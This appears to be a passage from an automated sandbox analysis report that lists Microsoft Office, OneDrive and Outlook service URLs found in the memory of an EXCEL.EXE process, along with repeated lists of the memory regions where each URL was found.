630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdatedh
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseu4
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?Z
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com11
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netNA
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com)8
    Source: EXCEL.EXE, 00000000.00000003.712956120.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844792206.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980144579.000000000D3B2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656130823.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885932857.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830927828.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843000292.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728531297.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792438393.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829149171.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843806955.0000000012A43000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000000.00000003.830019835.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887114579.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792860605.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844384510.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.976497308.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.846187037.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847870583.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831076747.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728160281.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843428711.000000000F1AC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comR87
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comiUrl
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000000.00000003.712956120.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844792206.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980144579.000000000D3B2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656130823.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885932857.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830927828.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843000292.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728531297.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792438393.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829149171.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843806955.0000000012A43000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/B
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.&F
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
